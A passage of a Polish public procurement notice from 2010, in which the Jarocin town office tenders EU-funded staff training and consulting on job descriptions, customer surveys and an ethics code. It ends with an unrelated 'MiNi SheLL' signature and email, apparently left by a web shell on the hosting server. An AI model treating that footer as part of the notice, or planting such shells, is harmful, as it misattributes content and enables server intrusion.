4)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
5)	dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego 
w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
6)	dopuszczalna jest zmiana umowy w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
7)	dopuszczalna jest zmiana umowy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy a  zmiany te są korzystne dla Zamawiającego,
8)	dopuszczalna jest zmiana umowy polegająca na zmianie terminu realizacji zamówienia wynikająca z przyczyn organizacyjnych leżących po stronie Zamawiającego (tj. m. in. choroba pracowników).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarocińskie Fundusz Poręczeń Kredytowych Sp. z o.o.
ul. T. Kościuszki 15B
63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 09:00, miejsce: Urząd Miejski w Jarocinie
Al. Niepodległości 10
63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie otrzymało dofinansowanie w ramach projektu Urząd Miejski w Jarocinie - TU WSZYSTKO GRA zwanym w dalszej części umowy Projektem, finansowanego 
w ramach Programu Operacyjnego Kapitał Ludzki realizowanego przez Zamawiającego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Szkolenie z zakresu Obsługi Klienta:
Termin realizacji: 4 szkolenia dwudniowe zgodnie z załączonym harmonogramem
W szkoleniu bierze udział  60 osób (4 grupy x 15 osób). 
Wykonawca przygotuje merytorycznie 3 komplety merytorycznych materiałów wraz 
z ćwiczeniami i podręcznikiem. 

Wykonawca w kosztach realizacji zadania uwzględni:
a)	wynajem sali dla szkolenia;
b)	wyżywienie uczestników na 4 dwudniowych szkoleniach - łącznie 30 osób,
c)	zakup noclegów dla 30 uczestników szkolenia. 

Celem niniejszych szkoleń jest podniesienie poziomu Obsługi Klienta w Urzędzie Miejskim w Jarocinie, zwiększenie poziomu satysfakcji zarówno urzędników, jak i Klientów Urzędu, usprawnienie i przyspieszenie tempa wydawania decyzji administracyjnych w Urzędzie Miejskim w Jarocinie  z zachowaniem zasad I Filaru Dobrego Rządzenia, wypracowanie i ujednolicenie standardów obsługi klienta zewnętrznego w Urzędzie Miejskim w Jarocinie - stworzenie zestawu dobrych praktyk, a także poinformowanie i przygotowanie pracowników do oceny ich pracy przez Klientów Urzędu - w ramach satysfakcji klientów.

2)	Szkolenie menadżerskie dla kadry zarządzającej Urzędem:
Termin realizacji: 6 szkoleń dwudniowych zgodnie z załączonym harmonogramem
Szkolenie przewidziane jest na 18 osób (2 grupy x 9 osób).
Temat szkolenia:
a)	Narzędziowy Trening Menadżerski,
b)	Szef a rozwój pracowników,
c)	Szef w procesie uczenia pracowników.

Wykonawca w kosztach realizacji zadania uwzględni:
a)	 wynajem sali dla szkolenia;
b)	wyżywienie uczestników w ciągu 12 dni szkoleń - łącznie 18 osób,
c)	zakup noclegów dla 18  uczestników szkolenia. 

Celem niniejszych szkoleń jest głównie wzmocnienie szczebla kierowniczego 
w Urzędzie, podniesienie poziomu realizowanych działań zgodnie z II Filarem Dobrego Rządzenia, zwiększenie efektywności pracy kierowników oraz podległych im zespołów, a także podniesienie poziomu umiejętności radzenia sobie w trudnych sytuacjach kierownik - pracownik.

3)	Szkolenie Komunikacja i zespołowość:
Termin realizacji: 6 szkoleń dwudniowych zgodnie z załączonym harmonogramem
W szkoleniu biorą udział wszyscy pracownicy Urzędu Miejskiego w Jarocinie - 80 osób (6 grup x ok. 13 osób). 
Wykonawca przygotuje 80 sztuk materiałów i wydruków dla uczestników szkolenia. 

Wykonawca w kosztach realizacji zadania uwzględni:
a)	wynajem sali dla szkolenia;
b)	wyżywienie uczestników w ciągu 12 dni szkoleń - łącznie 80 osób,
c)	zakup noclegów dla 80  uczestników szkolenia. 

Celem szkolenia jest wzrost efektywności pracy w zadaniach zespołowych wymagających współpracy, poprawa sprawności komunikacji w zespołach projektowych i zadaniowych realizujących politykę Urzędu, przekazanie uczestnikom konkretnych narzędzi interpersonalnych radzenia sobie w trudnych sytuacjach, podniesienie stopnia identyfikacji pracowników z Urzędem Miejskim w Jarocinie, 
a także ułatwienie procesu wdrażania efektywnego opisu stanowisk (w szczególności ewentualnych zmian w zespołach) oraz wdrożenia na szczeblu praktycznym procedur związanych z kodeksem etycznym.

Wykonawca w cenie ofertowej musi uwzględnić koszt przygotowania merytorycznego 
3 kompletów merytorycznych materiałów wraz z ćwiczeniami i podręcznikiem, tj. podręcznik i ćwiczenia oddzielnie dla szkolenia z zakresu Obsługi klienta, szkoleń menedżerskich oraz szkolenia z zakresu komunikacji i zespołowości. 
Każdy uczestnik szkolenia powinien otrzymać komplet szkoleniowy, tj. podręcznik 
i ćwiczenia.

Po każdym przeprowadzonym szkoleniu Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne pośród uczestników szkolenia, stworzyć raporty trenerów, które z kolei będą stanowić materiał wyjściowy do podsumowania rezultatów twardych i miękkich po całym cyklu szkoleń.

WAŻNE!!!
Szkolenie z zakresu Obsługi Klienta oraz Szkolenie Komunikacja i zespołowość musi być realizowane na terenie miasta Jarocin, w obiekcie do tego przystosowanym, tzn. posiadającym salę wykładową przystosowaną do kształcenia osób dorosłych, wyposażona 
w niezbędny sprzęt techniczny wymieniony poniżej. 

W zakres usługi hotelarsko-gastronomicznej będzie wchodziło:
-zapewnienie zakwaterowania dla uczestników szkolenia w godzinach szkoleniowych w pokojach 2 osobowych  z pełnym węzłem sanitarnym, 
-zapewnienie pełnego wyżywienia dla uczestników dwudniowych szkoleń tzn.:
-  pierwszy dzień szkoleniowy - dwudaniowy obiad z napojami, kolacja,
- drugi dzień szkoleniowy -  śniadanie, dwudaniowy obiad z napojami;
-zapewnienie całodziennego ciągłego serwisu kawowego podczas szkoleń, w ramach którego oferowana będzie minimum: kawa, herbata, cukier, śmietanka lub mleko, woda mineralna gazowana i niegazowana, ciasteczka słodkie lub ciasta dla uczestników szkoleń.

Ponadto oferent zobowiązany jest do:
-udostępnienia nieodpłatnie na terenie hotelu sali szkoleniowej mogącej pomieścić 
co najmniej 20 osób w układzie umożliwiającym pracę warsztatową; sala powinna być wyposażona minimum w: stoliki, krzesełka, nagłośnienie, ekran, gniazdka umożliwiające podłączenie rzutnika multimedialnego i laptopa oraz posiadać klimatyzację; sala powinna być dostępna dla uczestników szkoleń w godzinach szkolenia oraz dla trenerów przynajmniej na 1 godzinę przed i po zakończeniu zajęć,

-uwzględnienia w ramach wyżywienia dla uczestników, po uprzednim zawiadomieniu przez organizatora szkolenia, specjalnych wymagań związanych z dietą wegetariańską, wegańską, jarską itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie opracowań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 2 obejmuje swoim zakresem następujące czynności:
1)	wykonanie aktualizacji opisu stanowisk w Urzędzie Miejskim w Jarocinie wraz 
z badaniem luk kompetencyjnych i szczegółowych potrzeb szkoleniowych. Przeprowadzenie niniejszej czynności ma na celu usprawnienie prac, wydawanie efektywniejszych decyzji administracyjnych, porównanie stanowisk i obowiązków urzędników oraz wyszukanie luk lub dublowanie się określonych zajęć i eliminacja takich obszarów. Uporządkowanie zakresów obowiązków przyczyni się w dużym stopniu do lepszego uszeregowania hierarchii stanowisk oraz ułatwi dystrybucję nowych zadań, przydział do projektów wewnętrznych i zewnętrznych Urzędu oraz pomoże w jeszcze lepszej dystrybucji wewnętrznych środków finansowych. 

Niniejsza czynność wymagać będzie ok. 200 - 300 godzin pracy konsultantów na co składać się powinny między innymi: wywiady, przygotowanie kart opisu stanowisk, szkolenia wewnętrzne dotyczące wypełniania kart, rozmowy z kierownictwem, weryfikacja z istniejącymi dokumentami w Urzędzie Miejskim w Jarocinie. 
Efektem przedmiotowej czynności powinien być opracowany kompleksowy raport 
z aktualnym opisem stanowisk.

2)	Konsultacje(ok. 120h) z praktycznych aspektów stosowania Kodeksu Postępowania Administracyjnego, które maja na celu ułatwić przeprowadzenie procedury wydawania decyzji administracyjnych w Urzędzie Miejskim w Jarocinie - doradztwo prawne

3)	Kompleksowe badanie satysfakcji klientów przeprowadzone między klientami Urzędu Miejskiego. Badanie satysfakcji klientów powinno przyjąć formę rozmów telefonicznych, ankiet, wywiadów. Przeprowadzone badanie powinno pokazać pełen obraz stanu rzeczywistego , wskazać obszary do poprawy oraz ma sprawdzić oddziaływanie szkoleń z Obsługi Klienta  i pozostałych szkoleń  wpływających na podniesienie jakości pracy Urzędu. Przeprowadzone badanie powinno być uzupełnieniem oraz powinno wskazać  różnice postrzegania pracy Urzędu Miejskiego w Jarocinie przez mieszkańców pomiędzy przełomem 2008/2009 roku a rokiem 2011. Na przełomie 2008/2009 Urząd Miejski w Jarocinie przeprowadził badanie opinii mieszkańców gminy Jarocin na temat szeroko rozumianego zadowolenia z działań Gminy, w tym również z pracy Urzędu Miejskiego w Jarocinie. Wykonawca zobowiązany jest sporządzić raport, spełniający następujące zadania: 
- raport powinien posłużyć jako wdrożenie systemu monitorowania usług publicznych/satysfakcji klienta (zgodnie z 2 Filarem Państwa Prawa Skuteczność 
i Efektywność),
- poprzez przygotowanie i wprowadzenie do trwałego wykorzystania systemu ewaluacji pracy urzędników, będzie możliwość sprawdzenia różnic oceny i opinii mieszkańców przed i po przeprowadzonych szkoleniach z Obsługi Klienta,
- pokaże realną zmianę wobec danych  z końca 2008 roku.
Badaniu satysfakcji klientów będzie towarzyszyło wdrożenie systemu monitorowania usług publicznych i poprawa wskaźników jakości świadczonych usług poprzez specjalistyczne konsultacje w wymiarze 150 h, które doprowadzą do ustalenia kluczowych wskaźników (benchmarking).
4)	Aktualizacja Kodeksu Etycznego Pracowników Urzędu Miejskiego w Jarocinie oraz Kodeksu Postępowania Etycznego w Urzędzie Miejskim w Jarocinie o procedury mówiące o konsekwencjach złamania przez pracownika zasad etycznych. Zadaniem nadrzędnym jest uzupełnienie Kodeksu Etycznego o procedury, które wskazać mogą dokładnie jakie działania, kto, w jakim terminie może podjąć wobec pracowników UMJ łamiących zawarte w tych dokumentach normy. Powstałe narzędzie powinno się przyczynić się w sposób znaczący do usprawnień w zakresie podejmowania decyzji dyscyplinarnych i motywacyjnych w UMJ.

5)	Doradztwo w zakresie sporządzania Planu Rozwoju Lokalnego , tj. dokumentu , który w sposób kompleksowy będzie wskazywał kierunki przemian w UM oraz będzie uszczegółowieniem istniejącej Strategii Rozwoju Gminy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com